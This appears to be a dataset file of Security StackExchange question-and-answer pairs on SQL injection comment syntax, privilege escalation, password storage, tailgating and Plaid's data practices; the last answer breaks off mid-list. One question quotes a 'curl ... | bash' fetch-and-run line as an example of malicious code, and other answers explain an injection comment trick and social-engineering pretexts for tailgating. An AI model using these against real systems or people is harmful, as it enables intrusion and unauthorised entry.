source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
196,169 | I have encountered some websites that when I used -- to comment the rest of the query it didn't work, but when I tried --+ it worked. In the MySQL official documentation there is no such thing as --+ and we only have -- and two other ways. Why does this happen (in detail)? I want to know exactly why this works sometimes and -- doesn't, and why there is no --+ for comments in the MySQL man page? | From the documentation: From a -- sequence to the end of the line. In MySQL, the -- (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on). This syntax differs slightly from standard SQL comment syntax, as discussed in Section 1.8.2.4, “'--' as the Start of a Comment”. (emphasis mine) Many URL decoders treat + as a space. | {
"source": [
"https://security.stackexchange.com/questions/196169",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/187893/"
]
} |
196,249 | How are critical security updates installed on systems which you cannot afford to reboot but the update requires a reboot. For example, services/businesses that are required to run 24x7 with zero downtime, e.g. Amazon.com or Google. | There are various utilities in different operating systems which allow hot-patching of running code. An example of this would be kpatch and livepatch features of Linux which allow patching the running kernel without interrupting its operations. Its capabilities are limited and can only make trivial changes to the kernel, but this is often sufficient for mitigating a number of critical security issues until time can be found to do a proper fix. This kind of technique in general is called dynamic software updating . I should point out though that the sites with virtually no downtime ( high-availability ) are not so reliable because of live-patching, but because of redundancy. Whenever one system goes down, there will be a number of backups in place that can immediately begin routing traffic or processing requests with no delay. There are a large number of different techniques to accomplish this. The level of redundancy provides significant uptime measured in nines . A three nine uptime is 99.9%. Four nine uptime is 99.99%, etc. The "holy grail" is five nines, or 99.999% uptime. Many of the services you listed have five nine availability due to their redundant backup systems spread throughout the world. | {
"source": [
"https://security.stackexchange.com/questions/196249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/189630/"
]
} |
196,265 | In a different Question , in the first answer is written that some meta data doesn't get encrypted. What you shouldn't forget about encrypted e-mail, is that while the message body is properly encrypted, some meta data like the subject, sender or receiver aren't. What is the reason that Proton Mail doesn't encrypted some meta data? | Proton Mail uses an encryption format called OpenPGP . It is only designed to encrypt the message. Unless the subject is put in the message and the subject field is left blank, the subject will be kept unencrypted. The e-mail sender and receiver fields, on the other hand, need to be unencrypted for proper routing to occur. This is all a limitation in the design of e-mail, a default unencrypted system. | {
"source": [
"https://security.stackexchange.com/questions/196265",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/187394/"
]
} |
196,350 | Why do companies typically not give their employees root access to their desktop machines that are only used by a single employee? If what I can do on my machine poses a threat to the rest of the network, isn't a security flaw in itself? Why would the rights I have on my own machine affect what I can do to others on the network? Isn't the point of Unix user management to protect files of user A on machine X from access by user B on machine X? If it's about protecting the user from himself (say, from installing something with root access that will wipe out the hard drive): Since I am working without root access, all my files are owned by myself; hence, if I am fooled and run an evil script without root access and it wipes all only the files owned by myself, it is just as bad as if I had given it root access and it wiped the entire hard drive. | Security administrators are responsible for your machine and what happens on your machine. This responsibility violates the basic security model for a single-user Unix machine because the admin (an absent party) is root on your machine, you are not. Unix isn't really set up for this model. Admins need to be able to install security controls on your machine in order to protect the company, not just the data and the network and the other nodes. If the local user had root access then admins are no longer in control over those controls. That's the basic premise. Yes, there are tons of reasons why root is needed to do bad things or to turn the machine into a malicious node and all those are good reasons not to provide root access. And yes, there are lots of ways around those limitations and lots of ways that the local user could do bad things. But ultimately, the local user and the Risk Owner cannot be competing for control or responsibility over the machine. | {
"source": [
"https://security.stackexchange.com/questions/196350",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/186271/"
]
} |
196,455 | How to check whether the source code of an open-source project contains no malicious content? For example, in a set of source code files with altogether 30,000 lines, there might be 1-2 lines containing a malicious statement (e.g. calling curl http://... | bash ). Those projects are not well-known and it cannot be assumed that they are well-maintained. Therefore, the security of reusing their project source code cannot simply rely on blind trust (while it should be a reasonable assumption that it would be safe to download, verify, compile and run cmake directly, it doesn’t sound good to blindly use an arbitrary library hosted on GitHub). Someone suggested that I filter the source code and remove all non-ASCII and invisible characters (except some trivial ones like line breaks). Then open each file with a text editor and manually read every line. This is somewhat time-consuming, requiring full attention when I read the code, and actually quite error-prone. As such, I’m looking for general methods to handle such kind of situations. For example, are there any standard tools available? Anything I have to pay attention to if I really have to read manually? | There are automated and manual approaches. For automated, you could start with lgtm - a free static code analyser for open source projects and then move to more complex SAST solutions. For manual - you could build a threat model of your app and run it through OWASP ASVS checklist starting from it's most critical parts. If there is file deletion in your threat model - just call something like this: grep -ir 'os.remove(' . Of course it's better to combine them both. | {
"source": [
"https://security.stackexchange.com/questions/196455",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/114489/"
]
} |
196,591 | Can I send instructions embedded in an image to a target, if I know his CPU architecture? | CPU instructions are given in what are called opcodes , and you're right that those live in memory just like your image. They live in conceptually different "areas" of memory, though. For instance, you could imagine an opcode "read" (0x01) that reads a byte of input from stdin and puts it somewhere, and another operand "add" (0x02) that adds two bytes. Some opcodes can take arguments, so we'll give our example opcodes some: the "read" opcode takes an operand for where to store the byte it reads, and the "add" one takes three operands: two for where to read its inputs, and one for where to write the result to. 0x01 a1 // read a byte to memory location 0xa1
0x01 a2 // read a byte to memory location 0xa2
0x02 a1 a2 a3 // read the bytes at locations 0xa1 and 0xa2, add them,
// and write the result to location 0xa3 This is typical of how a lot of instructions work: most of them just operate on data that's in memory, and some of them put new data into memory from the outside world (from reading stdin, in this example, or from reading a file or network interface). While it's true that the the instructions and the data they operate on are both in memory, the program will only run the instructions. It's the job of the CPU, the OS, and the program to all make sure that happens. When they fail, you can in fact load data into the execution space, and it's a serious security bug. Buffer overflows are probably the most famous example of such a bug. But other than those kinds of bugs, you can essentially think of the data space and the execution space as being separate chunks of CPU. In a toy computer, using the example above, the memory might look something like: (loc) | Initial | After op 1 | After op 2 | After op 3 |
0x00 | *01 a1 | 01 a1 | 01 a1 | 01 a1 |
0x02 | 01 a2 | *01 a2 | 01 a2 | 01 a2 |
0x04 | 02 a1 a2 a3 | 02 a1 a2 a3 | *02 a1 a2 a3 | 02 a1 a2 a3 |
0x08 | 99 | 99 | 99 | *99 |
...
0xa1 | 00 | 03 | 03 | 03 |
0xa2 | 00 | 00 | 04 | 04 |
0xa3 | 00 | 00 | 00 | 07 | In that example, the asterisk ( * ) points to the next opcode that will be executed. The leftmost column specifies the starting memory location for that line. So for instance, the second line shows us two bytes of memory (with values 01 and a2 ) at locations 0x02 (explicitly in the left-hand column) and 0x03. (Please understand that this is all a big simplification. For instance, in a real computer the memory can be interleaved -- you won't just have one chunk of instructions and one chunk of everything else. The above should be good enough for this answer, though. ) Note that as we run the program, the memory in areas 0xa1 - 0xa3 changes, but the memory in 0x00 - 0x08 does not. The data in 0x00 - 0x08 is our program's executable, while the memory in areas 0xa1 - 0xa3 is memory the program uses to do the number crunching. So to get back to your example: the data in your jpeg will get loaded into the memory by opcodes, and will be manipulated by opcodes, but will not be loaded into their same area in memory. In the example above, the two values 0x03 and 0x04 were never in opcode area, which is what the CPU executes; they were only in the area that the opcodes read and write from. Unless you found a bug (like a buffer overflow) which let you write data into that opcode space, your instructions won't be executed; they'll just be the data that gets manipulated by the program's execution. | {
"source": [
"https://security.stackexchange.com/questions/196591",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190028/"
]
} |
196,664 | long story short if you can execute code on a box it is usually straightforward to get root ( quote source ) The immediate implication of this quote (if it's accurate) is that if you're running a multi-user system and don't try your darndest to prevent all users from creating files with x permission set, the system is as good as compromised. The corollary is that operating a multi-user system, such as ones typically found in universities, that by design allow all students to do exercises in C, C++, assembly etc, is pointless, since any student can straightforwardly root this system. Since running computer systems intended to be used by more people than their owners is not considered pointless, and privilege limiting facilities (users' rights management, sandboxing, etc etc) are not considered useless, I somehow doubt these kinds of comments. But what do I know? Is it true that most Linux systems are straightforwardly rootable by anyone who can execute code on them? | No, this is not correct. While one may argue about the relative difficulty of finding and exploiting 0day vulnerabilities on Linux when you have local access, the security architecture itself of a modern Linux system (with an MMU ) is designed to isolate different users and prevent privilege escalation. A non-root user cannot gain root without proper authorization without exploiting an extant vulnerability, and such privilege escalation vulnerabilities are very quickly patched as soon as they are discovered. * It is possible, however, to abuse the human factor and gain root by exploiting misconceptions ubiquitous in the sysadmin profession. This of course relies on the sysadmin misunderstanding the security architecture of the system they maintain. A non-exhaustive list of examples: Elevating privileges with sudo or su from an unprivileged but untrusted user. 1 Tricking a sysadmin into running ldd on a malicious static executable as root. 2 Abusing an insecurely installed binary. 3 Dropping down to a lesser user from root, allowing a TTY pushback attack. 4 5 * While this is ostensibly true, many deployments do not update themselves frequently enough, leading to live production systems being vulnerable to known bugs. An update being available does not guarantee an update being installed. | {
"source": [
"https://security.stackexchange.com/questions/196664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108649/"
]
} |
197,004 | Right now I'm generating a 25 character string stored in the database that can only have a 1 time use and expires 30 minutes after user registration. http://example.com/security/activate/ZheGgUNUFAbui4QJ48Ubs9Epd I do a quick database lookup and the logic is as follows: If the account is not activated AND if the email was not verified AND the validation code is still valid, activate the account, mark the email address as verified and mark the validation code as used. Every 72 hours for example it would flush expired and used validation codes.
This is in order to tell the user that the activation link clicked has expired for example if he look at his email the day after and try the link. Should I include the user UUID in the url? Do I need to include something else? I thought about making sure the IP address on the registration form match the IP address of the request when the activation link is pressed, but for me I mainly read my emails on my cellphone for this kind of stuff so it would be a pain for UX. | How are you generating the 25 character string which you include in the URL? Is it completely random, or is it based off the current time, or the users email? It should be random and not guessable. You should make sure the verification page actually renders (not just that a GET request occurred). Browsers such as chrome (and antivirus programs) often load URLs without the user explicitly clicking them as either a pre-fetch or to scan for security reasons. That could result in a scenario where a malicious actor (Eve) wants to make an account using someone else's email (Alice).
Eve signs up, and Alice received an email. Alice opens the email because she is curious about an account she didn't request. Her browser (or antivirus) requests the URL in the background, inadvertently activating the account. I would use JavaScript on the page to verify the page actually rendered, and also include a link in the email where users can report that they did NOT create this account. | {
"source": [
"https://security.stackexchange.com/questions/197004",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190501/"
]
} |
197,038 | My site has been getting probed by a bunch of IPs from Morroco (trying to submit forms, trying out potential URLs, trying to execute scripts etc..), I have a strong suspicion it's the same person after observing the pattern of how they behave. Looking at the logs they don't seem to have found any vulnerabilities. I'm not sure what I should do about this other than keep observing. Blocking the IP doesn't seem useful since it seems to change. Is there anything I can do about it at this point? | Welcome to the internet! This is the normal situation, business as usual. You don't have to do anything, but to harden your website. Probes like that occurs all the time, on every site, day and night. Some people call that "voluntary pen testing." Depending on your site, there are some tools that you can use to help you keep those kinds of probes out of the site. Wordpress sites have a couple plugins (you can search for Security plugins on the plugins directory), and I believe the other popular platforms out there will have equivalent plugins. Other tool I usually employ is fail2ban. It can parse your webserver log files, and react accordingly. | {
"source": [
"https://security.stackexchange.com/questions/197038",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/129001/"
]
} |
197,054 | I'm using the "keytool.exe" JDK utility to try to create a CSR (Certificate Signing Request) with the "-certreq" arg. Was wondering why this requires an alias (i.e. of another cert in the keystore) when I haven't even gotten the cert back yet from the CA (to whom I'd send the CSR). I understand that it could be used to marry the signed cert w/ an existing key pair/self-signed cert, but what I want to do is (to create a new cert): Generate a CSR to send to CA ("-certreq" arg). Upon receipt of signed cert, gen a new key pair ("-genkeypair arg)" w/ new alias . Import my new cert against that alias from #2. My contention is that I shouldn't need an existing keystore entry/alias for step# 1. Do I really need some dummy self-signed cert in the keystore 1st? Thx! | Welcome to the internet! This is the normal situation, business as usual. You don't have to do anything, but to harden your website. Probes like that occurs all the time, on every site, day and night. Some people call that "voluntary pen testing." Depending on your site, there are some tools that you can use to help you keep those kinds of probes out of the site. Wordpress sites have a couple plugins (you can search for Security plugins on the plugins directory), and I believe the other popular platforms out there will have equivalent plugins. Other tool I usually employ is fail2ban. It can parse your webserver log files, and react accordingly. | {
"source": [
"https://security.stackexchange.com/questions/197054",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/188339/"
]
} |
197,070 | I'm working on a cryptosystem that uses colour pictures as keys for encryption. I'm trying to guess what is the key size of my cryptosystem in order to find the feasibility of a brute force attack. My cryptosystem uses RGB pictures of any size M x N. The picture is also generated by a chaotic attractor which is sensitive to initial values, so each picture generated is different. These pictures are an example: I haven't found a paper that tries to do the same calculation yet. Any idea on what the key size is? | Your most recent edit indicates that your pictures are procedurally-generated, so your key size will therefore be bounded by the amount of state required to generate an image. Yours seem to be parameterized by four floats for the initial conditions (and fixed output image size, camera location, point light location, convergence conditions, etc). Those 128-bits of state will then be transformed into an image by an algorithm that depends solely on your provided state, so your image "key" cannot contain more than 128 bits of information. In fact, I think that entire classes of initial values produce identical outputs (e.g. when all four floats are extremely small), so your image "key" size will be strictly less than 128-bits. There's really no benefit to touching the 128 bits of state by turning it into an image (and then somehow back) if you only reduce the size of the key by doing so. | {
"source": [
"https://security.stackexchange.com/questions/197070",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190594/"
]
} |
197,169 | In a seminar, one of the Authors of Beehive: Large-Scale Log Analysis for Detecting Suspicious Activity in Enterprise Networks said that this system can prevent actions like Snowden did. From their articles' conclusions; Beehive improves on signature-based approaches to detecting security incidents. Instead, it flags suspected security incidents in hosts based on behavioral analysis. In our evaluation, Beehive detected malware infections and policy violations that went otherwise unnoticed by existing, state-of-the-art security tools and personal. Can Beehive or a similar system prevent Snowden type action? | A backup operator will have the permission and behavioral markers of someone that moves lots of data around. Like any sysadmin where there's no dedicated backup operator in place. Snowden was a sysadmin. He would knew all the protection protocols in place. He could just impersonate anyone, from any area, download things, impersonate the next one, and keep doing that. If it's common knowledge that there's no bulletproof protection against a dedicated attacker, imagine a trusted internal dedicated attacker with sysadmin privileges. | {
"source": [
"https://security.stackexchange.com/questions/197169",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/86735/"
]
} |
197,236 | Let's say I have a database with a bunch of users in it. This user database would typically have a hashed password per user. Would it be bad practice to prefix this hash with the hashing algorithm used? For instance, instead of the hash aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d , I store sha1_aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d , since the method for making the hash is SHA1. I noticed Argon2 does this, and I actually think it is quite convenient, because it makes it easier to partially migrate to newer hashing algorithms for newer users over time. I don't use SHA1 in my production code for passwords. SHA1 was chosen randomly. This question is not about the use of the hashing method. | Many different password hashing systems do this. The type of hashing mechanism used should not be (and should not need to be) a secret. Kerckhoffs's principle says: A cryptosystem should be secure even if everything about the system,
except the key, is public knowledge. So, if your system is properly secure, it should not matter if the hash mechanism is exposed. | {
"source": [
"https://security.stackexchange.com/questions/197236",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/177287/"
]
} |
197,250 | I live in a city where CCTV camera coverage is comprehensive and increasing. Cameras are getting cheaper and higher resolution. Everyone has a video camera in their pocket already, and we are starting to see trends which indicate always-on cameras may become commonplace in other devices like glasses. It has occurred to me, when out in public and entering my username/password into apps on my phone and laptop, that if a camera could capture both my screen and my keyboard, it could be fairly straightforward for a viewer to grab or guess my credentials from the footage assuming a high enough resolution image and the view not being (too) obscured. Without going too much into the details of how it would be implemented, the accuracy and cost etc, I have a background in image processing and so am also aware that this would likely be automatable to at least some degree. So I thought I would ask the community here if this is actually a viable risk? Have there been any known instances of it happening already? Are people thinking about this with respect to the viability of plaintext credential entry into apps in the long run? | Lots of examples. A high-profile and recent example is when Kanye was caught on camera entering his "00000" password to unlock his device. Shoulder-surfing is one reason why applications do not display the password text on the screen, but show ****** instead. And this is one reason why multi-factor authentication is so important; even if you know the password, you cannot use it without another factor. I have even seen viable research into capturing the sound of the keyboard when a user types the password, even over the computer's microphone . So, yes, you describe a viable risk that the industry has been addressing for a long time. The specifics of high-res cameras is just not a significant enough of a new factor to consider. Shoulder-surfing and keyloggers are a current risk. The industry knows that it needs to develop something better than passwords, and there are many active attempts to do so, but nothing is mature or stable enough yet. | {
"source": [
"https://security.stackexchange.com/questions/197250",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55705/"
]
} |
197,330 | Say my password is abc . I want to send it to the server over HTTP. I could send it in plaintext and let the server hash it and compare it to the entries in its database, but then anyone that can see traffic over that connection would see the password in plain text. So then I could hash it client-side and let the server just compare it without hashing since it's already hashed (or the server could even double hash, but no difference in this situation). But then again anyone that can see the traffic would see the password hashed, and then send the hashed password to the server and the server would accept it. How do I send passwords over HTTP? Do I need to implement some encryption algorithm like RSA public key encryption? Or is this impossible? The method should be usable in any browser. | You can't. To securely send information over an unsecure channel, you need encryption. Symmetric encryption is out, because you would first need to transport the key, which you can't do securely over an unsecure channel[*]. That leaves you with public key cryptography. You could of course roll your own , but you don't want to be a Dave , so that's out, which leaves you with HTTPS. [*] You can of course try to use a secure channel to exchange the key, for example physical exchange of a key. Then you can use secret key crypto, like Kerberos. | {
"source": [
"https://security.stackexchange.com/questions/197330",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190914/"
]
} |
197,588 | I was just surprised to see this suspicious promoted tweet, asking me to send Bitcoins I added the hand-drawn red lines so I am not responsible for propagating the apparent scam. Clicking on the user name seems to take me to the genuine Target page with the verified checkmark. Clicking on the link to the tweet (i.e. "40m") gives me an error that the tweet no longer exists. Clicking on the URL goes to a page that looks like the screenshot, and a list of transactions. Is it fair for me to conclude: Target lost control of their Twitter account to an (internal or external) scammer, who is ripping off people who think they are having a give-away? Is there another way their username could appear advertising a scam without access to their Twitter account credentials? | Yes, Target did have their account hacked. In fact, quite a lot of verified account holders have been hacked to further this scam. The scammers do this to impersonate other accounts, including Elon Musk's, by changing their name while retaining their verified status. In this case, it just looks like the scammer is using Target's account directly. This scam has made the hackers over $150,000. The Elon Musk scam is the most well-known now, but it appears Target was caught as well . | {
"source": [
"https://security.stackexchange.com/questions/197588",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40146/"
]
} |
197,720 | At my job, to be able to view my paychecks, vacation hours and HR data on myself I need to log into a 3rd party website. I'm by no means a security expert or expert programmer but I could tell (simply by trying) that I could continue to try incorrect passwords without being locked out. (brute force: viable) After logging in I was forced to select 3 pre-determined security questions in the case of a password reset (out of a total of 8!) such as my first car's licence plate (never owned a car 3/7), my spouse's 2nd name (don't have a spouse 3/6), 2nd name of my first kid (don't have kids 3/5), birthdate, name of my highschool, favorite pet, favorite film or favorite piece of music. Most these things you can simply get from my facebook, (which, I should note, has not been updated for years!) again showing a distinct lack of understanding in basic security practices. I also get the feeling, from looking at the site through the developer tools they use incredibly outdated software A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. I reported this through my company but my superiors don't appear all that interested. How would I go about: A. Finding out if this site is really as insecure as I think it is? B. if true: communicating this in an appropriate manner to the company itself
(preferably in an anonymous fashion) | To start with the easy bit: you do not have to put real information as the answers to the questions. Random strings work best if you are really paranoid and store them in a password manager just like a password. The rest (no brute force protection, potentially outdated software) is a shame, but there is nothing that you can do, from a security perspective. I would raise the issue with HR/Payroll and ask them to investigate. If you are in Europe, then you can also talk to your DPO to suggest that their "Data Processor" has troubling account security practices that need to be investigated. Otherwise, this is more of an internal office politics issue. | {
"source": [
"https://security.stackexchange.com/questions/197720",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191356/"
]
} |
197,732 | Following people into a large RFID protected residential building is ridiculously easy, as not everyone knows everyone else. Just the other day I was let in with a rifle (an airgun, but how could have they known). But standing helplessly in front of the door, looking in sorrow at the lock, is not the best role to play as it attracts questions like "who are you" or "who are you visiting". What is a more appropriate behavior when waiting around for someone to enter? | There are some basic social engineering approaches to use that work in most situations, not just tailgating: urgency authority curiosity pretexting Urgency Be someone with a specific task to perform that needs to be done right now. The classics are a delivery person with full arms and someone looking to pick someone else up. A family member needing to check on an elderly resident. People want to be helpful and they don't think that you will be around long enough to be a threat. Authority Be someone who the gatekeeper has no right or reason to refuse. Fire marshal, utilities inspector, law enforcement, building security, process server. Lots of studies of people being let in with a just clipboard and a high-visibility vest. Curiosity To get close to someone, be very interesting in such a way that they want to know more. Dress up as a clown to deliver a telegram. Pretexting Establish a shallow relationship that appears to be deeper. Smoking with people outside on their break is classic. The smokers will assume you are also an employee (why else would you be there?) Combinations But these work even better in combination. A fire marshal in an awful rush. A clown who claims he was at the last company party (and knows a few important names). The more combinations you can combine, the more effective the process is — an authority figure, in a rush, to do something interesting, who claims to have a preexisting relationship. If you go over the top or try too hard, it will backfire, though. | {
"source": [
"https://security.stackexchange.com/questions/197732",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10990/"
]
} |
197,786 | I have a REST API for running some calculations and returning the result, with a very simple token system where only authorized users can use the API. The user adds their token to the query like this: {
authorization: 'my token',
moreData: 51351,
etc: 'etc'
} Because the users of this API are usually not programmers, I have made a very simple web page demonstrating the API, with a live demo that can be run directly from the web page, demonstrating how it works and what is returned. This demonstration has a fake authorization token, which is displayed in the example query. I have made a simple, hidden and partially obfuscated JavaScript function that intercepts this fake token and replaces it with an actual token before sending the request, which will probably trick most users. But a user that actually watches the request from the debug tool in the browser will easily see the actual token that is sent, and can use this token to send their own request. Of course, I could rate limit the demo token, but then that would mean that users who are experimenting with the live demo could experience temporary lock-outs, which I would like to avoid. Is there any way of protecting the demo authorization token from an API that needs to be easy to use, and needs a live demo? | As Steffen has said you cannot protect the token from users. I'd just like to add a suggestion for a more general scenario of having a "demo" Api. It sounds like your API doesn't have any stored data and just does calculations on input so this may not be a concern for you, but rather than having the demo token point to your real api, you could point it to a demo / sandbox version with meaningful, but not real data that could: only have the demo token in it - no other users be reset automatically on a daily basis have a small amount of data in it rather than your full set (if you have data) potentially not return valid results for all calculations as a way of requiring people get a real account from you rather than just using the demo token This would feel safer to me as your live system would never be touched by anybody with the demo token, and in scenarios where you may have functionality you are selling etc, it allows developers to integrate and confirm they have integrated correctly, but doesn't give away the full set of functionality/data to the demo token. | {
"source": [
"https://security.stackexchange.com/questions/197786",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69663/"
]
} |
197,817 | This is a follow-up question to this one: Roles to play when tailgaiting into a residential building How do you protect yourself or your company against tailgaters? What is the best answer when you are asked by, let's say the delivery guy, to let you in? | This is not a problem that has a social solution. No amount of corporate policy will save you. Humans are social animals. In the end, if people can let other people in, they will. Even if you may be very security aware and not let anyone in, 95% of your collegues will act differently. You have to work with human nature, not against it. So if you want to stop tailgating, you'll need one of these, perferably placed in a reception with human supervision: | {
"source": [
"https://security.stackexchange.com/questions/197817",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191453/"
]
} |
197,994 | I have to store passwords on a system which doesn't offer any of the algorithms recommended for hashing passwords (e.g. bcrypt, scrypt or PBKDF2). Would it be better to use an unsuitable algorithm (e.g. SHA-1 or SHA-2 family) before using none? Additional Information : I will be the only one storing passwords on that system, so I can 1) guarantee that none of the passwords will be used twice and 2) ensure that the passwords will have a very high entropy. | The real answer to your question is simply do not store the passwords there if you cannot properly protect them. "The system does not support proper password hashing algorithms" is not a valid excuse to compromise the security of your users. Either find a way to properly hash passwords using a strong and properly configured algorithm or do not store them. But to provide a direct answer to your question: yes, something is better than nothing. SHA-1 or SHA-2 is definitely an improvement over plaintext. To answer the "then where should the passwords go?" question - Based on the phrasing I am assuming there is a new feature/request for the software that requires the system to store passwords. If the system cannot properly and securely store passwords (by modern security standards) then I (personally) would reject the request. Intentionally practicing poor security because of legacy system constraints or to appease a business use case is bad security practice. I would inform whoever made the request that I have two viable options: We have to completely overhaul the system to one that supports modern security practices (such as proper cryptographic password hashing). I simply cannot add the new feature/request to the existing system for it would compromise security. | {
"source": [
"https://security.stackexchange.com/questions/197994",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76285/"
]
} |
198,005 | I recently signed up for Privacy.com, which uses a service called Plaid to link a bank account. To do this, it requires the user to provide their banking username and password to a webpage from Plaid, not their bank. Then, Plaid accesses the user’s bank account with those credentials on the user’s behalf to get information. Plaid provides an API for websites and apps to easily access this banking information. In addition to Privacy.com, plenty of other popular services use Plaid, including Venmo, Robinhood, and Coinbase. Despite the popularity, this service appears to break two "fundamental" Internet security rules: Never give credentials to a third party. The standard is to redirect the user to a login page on the website of the service providing the login. Plaid doesn’t do this, instead providing the login form on their own website. Even worse, Plaid allows services to embed the form in their websites (as an iframe). It’s not possible for casual internet users to tell the difference between this and an “unsecured” form on some random website, so this appears to be encouraging bad security practice. Worse still, Plaid provides a login page that looks very official, showing the bank logo and using the bank’s color scheme. Never store passwords in plaintext. The only way for Plaid to access bank account details is with the password, and since my banking password was only required by Plaid once, they must be storing it in plaintext, or "encrypted" but convertible to plain text, so they can continue to use it to access my account. The problem seems to be that most banks do not provide an API to retrieve customer data, so a service like Plaid (and all the services that use Plaid) simply wouldn't be possible without breaking these "fundamental" security rules. But I'm not convinced that's justification for breaking them. If it's not possible to do it securely, should it be done at all? My confusion here is that all of these services are "legitimate". None of them are scams; they're all providing a valuable service and have a solid reputation. Plaid has raised billions in funding! I would think with Plaid using bank logos to make their “fake” bank login forms look legitimate, banks would be after Plaid with lawsuits. But apparently some of them are investors! On Plaid’s website Citi, American Express, and others are listed as investors. It appears that banks aren’t against this bad practice, and are, in some cases, actually encouraging it. This makes me think that I might be missing something. Maybe Plaid has some special access to banking systems and it isn’t as bad as it seems. On the other hand, maybe Plaid’s reputation is held up only by the fact that they haven't been hacked yet. If (when) they are hacked it will be devastating, since the worst case scenario means the leaking of millions of user's active bank usernames and passwords. Also, many banks don’t protect users if they knowingly gave their credentials to a third party, so a lot of people could lose a lot of money. But if that's the case, wouldn't banks be working to stop Plaid and protect their customers? I think many of the services provided by Plaid are neat and would like to use them, but if my suspicious here are correct I don’t think I can do so while remaining secure. Of course, I hope I’m completely wrong here and Plaid has some way to operate securely. So, does Plaid have some special access to banking systems, or is it using user passwords to log in to bank accounts, which requires storing them in plaintext (or convertible to plaintext) and convincing users to give their credentials to a third-party, encouraging bad security practice? If it’s the latter, I’m afraid I’ll have to pass on Plaid services for now and consider my banking password compromised. | I want to point out that despite Plaids apparently honest attempts at security, their approach is a privacy nightmare, as you give full access to Plaid, to all and every single information your bank has on you, including loans, funds, investment accounts, credit card statements, address, etc. This makes Plaid differ substantially from other payment services, such as PayPal, as they only have your account number. If you don't believe me, here's their data collection description from their privacy statement (Effective Date: February 22, 2021, my italics): Information we collect from your financial accounts. The information we receive from the financial product and service providers that maintain your financial accounts varies depending on a number of factors, including the specific Plaid services developers use, as well as the information made available by those providers. But, in general, we collect the following types of identifiers, commercial information, and other personal information from your financial product and service providers: Account information, including financial institution name, account name, account type, account ownership, branch number, IBAN, BIC, account number, routing number, and sort code; Information about an account balance , including current and available balance; Information about credit accounts , including due dates, balances owed, payment amounts and dates, transaction history , credit limit, repayment status, and interest rate; Information about loan accounts , including due dates, repayment status, balances, payment amounts and dates, interest rate, guarantor, loan type, payment plan, and terms; Information about investment accounts , including transaction information , type of asset, identifying details about the asset, quantity, price, fees, and cost basis; Identifiers [ NB : SSN?] and information about the account owner(s), including name, email address, phone number, date of birth, and address information ; Information about account transactions, including amount, date, payee, type, quantity, price, location, involved securities, and a description of the transaction ; and Professional information, including information about your employer, in limited cases where you’ve connected your payroll accounts or provided us with your pay stub information. The data collected from your financial accounts includes information from all accounts (e.g., checking, savings, and credit card) accessible through a single set of account credentials . Also note how the scope of the information collected has expanded over time, by looking at the previous revisions of this answer. To make matters even worse, they can share all that information with their customers, i.e., the company that wants you to link with them. That means that when, e.g., your rent is paid via Plaid (my landlord uses a service that relies on Plaid), all of that information may be shared with that service! And while they, in turn, may not distribute that data further, you now have to trust another party that they are able to keep your data safe. Again, here's the relevant excerpt from that privacy statement (again, my italics): How We Share Your Information We share your End User Information for a number of business purposes: With the developer of the application you are using and as directed by that developer (such as with another third party if directed by you); To enforce any contract with you; With our data processors and other service providers, partners, or contractors in connection with the services they perform for us or developers; [...] In connection with a change in ownership or control of all or a part of our business (such as a merger, acquisition, reorganization , or bankruptcy); Between and among Plaid and our current and future parents, affiliates , subsidiaries and other companies under common control or ownership; As we believe reasonably appropriate to protect the rights, privacy, safety, or property of you, developers, our partners, Plaid, and others; or For any other notified purpose with your consent. | {
"source": [
"https://security.stackexchange.com/questions/198005",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191697/"
]
} |
198,006 | Is it possible to trigger a reader from a standard RFID Access Control System? More specifically the badge system commonly used in companies for allowing entry. As in passing an ID to it? Assuming you have a valid ID you can send to it. I'm aware there are multiple technologies involved in these type of systems but I'm referring to the more common case (having to place a non-active tag near a reader). | I want to point out that despite Plaids apparently honest attempts at security, their approach is a privacy nightmare, as you give full access to Plaid, to all and every single information your bank has on you, including loans, funds, investment accounts, credit card statements, address, etc. This makes Plaid differ substantially from other payment services, such as PayPal, as they only have your account number. If you don't believe me, here's their data collection description from their privacy statement (Effective Date: February 22, 2021, my italics): Information we collect from your financial accounts. The information we receive from the financial product and service providers that maintain your financial accounts varies depending on a number of factors, including the specific Plaid services developers use, as well as the information made available by those providers. But, in general, we collect the following types of identifiers, commercial information, and other personal information from your financial product and service providers: Account information, including financial institution name, account name, account type, account ownership, branch number, IBAN, BIC, account number, routing number, and sort code; Information about an account balance , including current and available balance; Information about credit accounts , including due dates, balances owed, payment amounts and dates, transaction history , credit limit, repayment status, and interest rate; Information about loan accounts , including due dates, repayment status, balances, payment amounts and dates, interest rate, guarantor, loan type, payment plan, and terms; Information about investment accounts , including transaction information , type of asset, identifying details about the asset, quantity, price, fees, and cost basis; Identifiers [ NB : SSN?] and information about the account owner(s), including name, email address, phone number, date of birth, and address information ; Information about account transactions, including amount, date, payee, type, quantity, price, location, involved securities, and a description of the transaction ; and 